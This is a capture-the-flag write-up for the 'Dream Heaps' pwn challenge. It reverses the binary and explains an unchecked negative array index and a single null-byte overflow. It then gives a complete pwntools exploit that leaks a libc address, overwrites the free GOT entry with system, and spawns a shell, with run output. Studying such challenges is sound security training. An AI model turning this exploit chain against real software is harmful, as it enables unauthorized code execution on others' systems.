Tags: pwn

Rating:

# Dream Heap

This writeup goes out to my friend and the person who made this challenge the man the myth the legend himself, noopnoop.


$file dream_heaps dream_heaps: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=9968ee0656a4b24cb6bf5ebc1f8f37d4ddd0078d, not stripped$ pwn checksec dream_heaps
[*] '/Hackery/swamp/dream/dream_heaps'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
$./dream_heaps Online dream catcher! Write dreams down and come back to them later! What would you like to do? 1: Write dream 2: Read dream 3: Edit dream 4: Delete dream 5: Quit >  So we are given a libc file libc6.so, and a 64 bit elf with no PIE or RELRO. The elf allows us to make dreams, read dreams, edit dreams, and delete dreams. ### Reversing When we look at the main function in ghidra, we see that it is essentially just a menu for the four different options:  void main(void) { long in_FS_OFFSET; undefined4 menuOption; undefined8 canary; canary = *(undefined8 *)(in_FS_OFFSET + 0x28); menuOption = 0; puts("Online dream catcher! Write dreams down and come back to them later!\n"); puts("What would you like to do?"); puts("1: Write dream"); puts("2: Read dream"); puts("3: Edit dream"); puts("4: Delete dream"); printf("5: Quit\n> "); __isoc99_scanf(&DAT_00400b60,&menuOption); switch(menuOption) { default: puts("Not an option!\n"); break; case 1: new_dream(); break; case 2: read_dream(); break; case 3: edit_dream(); break; case 4: delete_dream(); break; case 5: /* WARNING: Subroutine does not return */ exit(0); }  When we look at the Ghidra pseudocode for the new_dream function which allows us to write new dreams, we see this:  void new_dream(void) { long lVar1; void *dreamPtr; long in_FS_OFFSET; int dreamLen; long canary; lVar1 = *(long *)(in_FS_OFFSET + 0x28); dreamLen = 0; puts("How long is your dream?"); __isoc99_scanf(&DAT_00400b60,&dreamLen); dreamPtr = malloc((long)dreamLen); puts("What are the contents of this dream?"); read(0,dreamPtr,(long)dreamLen); *(void **)(HEAP_PTRS + (long)INDEX * 8) = dreamPtr; *(int *)(SIZES + (long)INDEX * 4) = dreamLen; INDEX = INDEX + 1; if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); return; }  So for making a new dream, it first prompts us for a size. It then mallocs a space of memory equal to the size we gave it. It then let's us scan in as many bytes as we specified with the size. It then will save the heap pointer and the size of the space in the HEAP_PTRS and SIZES bss arrays at the addresses 0x6020a0 and 0x6020e0 (double click on the pointers in the assembly to see where they map to the bss). The index in the array will be equal to the value of INDEX which is a bss integer stored at 0x60208c. After this it will increment the value of INDEX. Next up we have the read function:  void read_dream(void) { long lVar1; long in_FS_OFFSET; int index; long canary; lVar1 = *(long *)(in_FS_OFFSET + 0x28); puts("Which dream would you like to read?"); index = 0; __isoc99_scanf(&DAT_00400b60,&index); if (INDEX < index) { puts("Hmm you skipped a few nights..."); else { printf("%s",*(undefined8 *)(HEAP_PTRS + (long)index * 8)); if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); return; }  Here we can see that it prompts us for an index to HEAP_PTRS, and first checks that it is not larger than INDEX to prevent us from reading something past it. It will then grab a pointer from HEAP_PTRS from the desired index, and print it. However there is a bug here. While it checks to make sure that we gave it an index smaller than or equal to INDEX, it doesn't check to see if we gave it an index smaller than one. This bug will allow us to read something from memory before the start of the HEAP_PTRS array in the bss. In addition to that since INDEX is incremented after it adds a new value, it will be equal to the next dream that is allocated. Since it just checks to make sure our index isn't greater than INDEX we can go past one spot for the end of the pointers in HEAP_PTRS. Next up we have the edit_dream function:  void edit_dream(void) { long lVar1; long in_FS_OFFSET; int index; long canary; void *ptr; int size; lVar1 = *(long *)(in_FS_OFFSET + 0x28); puts("Which dream would you like to change?"); index = 0; __isoc99_scanf(&DAT_00400b60,&index); if (INDEX < index) { puts("You haven\'t had this dream yet..."); else { ptr = *(void **)(HEAP_PTRS + (long)index * 8); size = *(int *)(SIZES + (long)index * 4); read(0,ptr,(long)size); *(undefined *)((long)ptr + (long)size) = 0; if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); return; }  So here it prompts us for an index, and has the same vulnerable index check from read_dream. If the index check passes it will take the pointer stored in HEAP_PTRS and the integer stored in SIZES at the index you specified and allow you to write that many bytes to the pointer. After that it will null terminate the buffer by setting ptr + size equal to 0x0. However since arrays are zero index, it should be ptr + (size - 1) and thus it gives us a single null byte overflow. The last function we'll look at closely is the delete_dream function:  void delete_dream(void) { long lVar1; long in_FS_OFFSET; int index; long canary; lVar1 = *(long *)(in_FS_OFFSET + 0x28); puts("Which dream would you like to delete?"); index = 0; __isoc99_scanf(&DAT_00400b60,&index); if (INDEX < index) { puts("Nope, you can\'t delete the future."); else { free(*(void **)(HEAP_PTRS + (long)index * 8)); *(undefined8 *)(HEAP_PTRS + (long)index * 8) = 0; if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); return; }  So just like the read_dream and edit_dream functions, it prompts us for an index and runs a vulnerable check on it. If it passes, it will free the pointer in HEAP_PTRS stored at that index and set it equal to 0 (so no use after free here). However it leaves the corresponding value in SIZES behind. ### Exploitation So we have an index check bug with the read, edit, and free function. On top of that we have a single null byte overflow. We can use the index check bug in the read function to get a libc infoleak. After that we can use the index check bug with the edit function to get that got table overwrite. The intended solution was to use the single null byte overflow to cause heap consolidation, however this seems a bit easier. For the libc infoleak, we will need a pointer to a pointer to a libc address. This is because with the dreams are stored in a 2D array. Luckily for us since there is no PIE we can just read an address from the got table (which is a table mapping various functions to their libc addresses). However first we will need an address to the got table, which we can find using gdb:  gef➤ p puts$1 = {int (const char *)} 0x7ffff7a649c0 <_IO_puts>
gef➤ search-pattern 0x7ffff7a649c0
[+] Searching '0x7ffff7a649c0' in memory
[+] In '/Hackery/pod/modules/index/swampctf19_dreamheaps/dream_heaps'(0x602000-0x603000), permission=rw-
0x602020 - 0x602038 → "\xc0\x49\xa6\xf7\xff\x7f[...]"
gef➤ search-pattern 0x602020
[+] Searching '0x602020' in memory
[+] In '/Hackery/pod/modules/index/swampctf19_dreamheaps/dream_heaps'(0x400000-0x401000), permission=r-x
0x400538 - 0x400539 → ""


Here we can see that the address 0x400538 will work for us. To leak the address we just need to read the dream at offset -263021. This is because HEAP_PTRS starts at 0x6020a0 and 0x6020a0 - 0x400538 = 0x201b68 and 0x201b68 / 8 = 263021.

Now for the got overwrite, we can use a couple of things to exploit that. Firstly if we make enough dreams, they will overflow into the sizes. This is because there isn't a check for this, and SIZES starts at 0x602080 and HEAP_PTRS starts at 0x6020a0. The difference between the two is 0x40 bytes, and since pointers are 0x8 bytes it will just be 8 pointers before we start overflowing them. In addition to that since ints are 4 bytes, the two will overlap nicely and end up being written behind the pointers. When we try making a lot of different dreams, we see that we can end up writing a pointer than can be reached by the edit_dream function:


gef➤ x/30g 0x6020a0
0x6020a0 <HEAP_PTRS>: 0x00000000013ea020 0x00000000013ea040
0x6020b0 <HEAP_PTRS+16>: 0x00000000013ea070 0x00000000013ea0b0
0x6020c0 <HEAP_PTRS+32>: 0x00000000013ea100 0x00000000013ea160
0x6020d0 <HEAP_PTRS+48>: 0x00000000013ea1d0 0x00000000013ea250
0x6020e0 <SIZES>: 0x00000000013ea2e0 0x00000000013ea380
0x6020f0 <SIZES+16>: 0x00000000013ea430 0x00000000013ea4f0
0x602100: 0x00000000013ea5c0 0x00000000013ea6a0
0x602110: 0x00000000013ea790 0x00000011013ea890
0x602120: 0x0000003300000022 0x0000005500000044
0x602130: 0x0000007700000066 0x0000009900000088
0x602140: 0x000000bb000000aa 0x000000dd000000cc
0x602150: 0x00000000013eaac0 0x00000000013eab50
0x602160: 0x00000000013eac00 0x00000000013eacc0
0x602180: 0x0000000000000000 0x0000000000000000


The pointers are addresses like 0x13eaac0, and the sizes are the integers like 0x99 and 0x88. At 0x602128 (which would be at index 17) we can see would be a nice place to write a pointer with the sizes. This is not only because we control it with sizes, but when we edit a dream it will also grab a size from the SIZES array that we will need to be at least 0x8. If we choose index 17, it will grab the integer from 0x602124 which we also control it with the sizes. So by choosing the offset 17 to edit, by making dreams with certain sizes we can control both the address that is written to and the size.

Also for the function that we will be overwriting the got address of will be free at 0x601fb0. This is because it won't cause any real issues for us, and to get a shell we will just have to free a dream with the contents /bin/sh:


$objdump -R dream_heaps | grep free 0000000000602018 R_X86_64_JUMP_SLOT free@GLIBC_2.2.5  ### Code Putting it all together into our exploit, we get this. Also since our exploit relies on calling code from libc, it is dependent on which libc version you're using. If you're libc version is different then the one in the exploit, just swap out the file (check memory mappings in gdb to see which one you're using if this exploit doesn't work):  from pwn import * target = process('./dream_heaps') libc = ELF('libc-2.27.so') # If you have a different libc file, run it here gdb.attach(target) puts = 0x662f0 system = 0x3f630 offset = system - puts def write(contents, size): print target.recvuntil('> ') target.sendline('1') print target.recvuntil('dream?') target.sendline(str(size)) print target.recvuntil('dream?') target.send(contents) def read(index): print target.recvuntil('> ') target.sendline('2') print target.recvuntil('read?') target.sendline(str(index)) leak = target.recvuntil("What") leak = leak.replace("What", "") leak = leak.replace("\x0a", "") leak = leak + "\x00"*(8 - len(leak)) leak = u64(leak) log.info("Leak is: " + hex(leak)) return leak def edit(index, contents): print target.recvuntil('> ') target.sendline('3') print target.recvuntil('change?') target.sendline(str(index)) target.send(contents[:6]) def delete(index): print target.recvuntil('> ') target.sendline('4') print target.recvuntil('delete?') target.sendline(str(index)) # Get the libc infoleak via absuing index bug puts = read(-263021) libcBase = puts - libc.symbols['puts'] # Setup got table overwrite via an overflow write('/bin/sh\x00', 0x10) write('0'*10, 0x20) write('0'*10, 0x30) write('0'*10, 0x40) write('0'*10, 0x50) write('0'*10, 0x60) write('0'*10, 0x70) write('0'*10, 0x80) write('0'*10, 0x90) write('0'*10, 0xa0) write('0'*10, 0xb0) write('0'*10, 0xc0) write('0'*10, 0xd0) write('0'*10, 0xe0) write('0'*10, 0xf0) write('0'*10, 0x11) write('0'*10, 0x22) write('0'*10, 0x18) write('0'*10, 0x602018) write('0'*10, 00) # Write libc address of system to got free address edit(17, p64(libcBase + libc.symbols['system'])) # Free dream that points to /bin/sh to get a shell delete(0) target.interactive()  when we run it: $ python exploit.py
[+] Starting local process './dream_heaps': pid 9062
[*] '/Hackery/pod/modules/index/swampctf19_dreamheaps/libc-2.27.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] running in new terminal: /usr/bin/gdb -q "./dream_heaps" 9062 -x "/tmp/pwnjqPcIc.gdb"
[+] Waiting for debugger: Done
Online dream catcher! Write dreams down and come back to them later!

. . .

Which dream would you like to delete?
[*] Switching to interactive mode

$w 22:17:41 up 1:47, 1 user, load average: 0.39, 0.45, 0.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT guyinatu :0 :0 20:31 ?xdm? 3:50 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu$ ls
`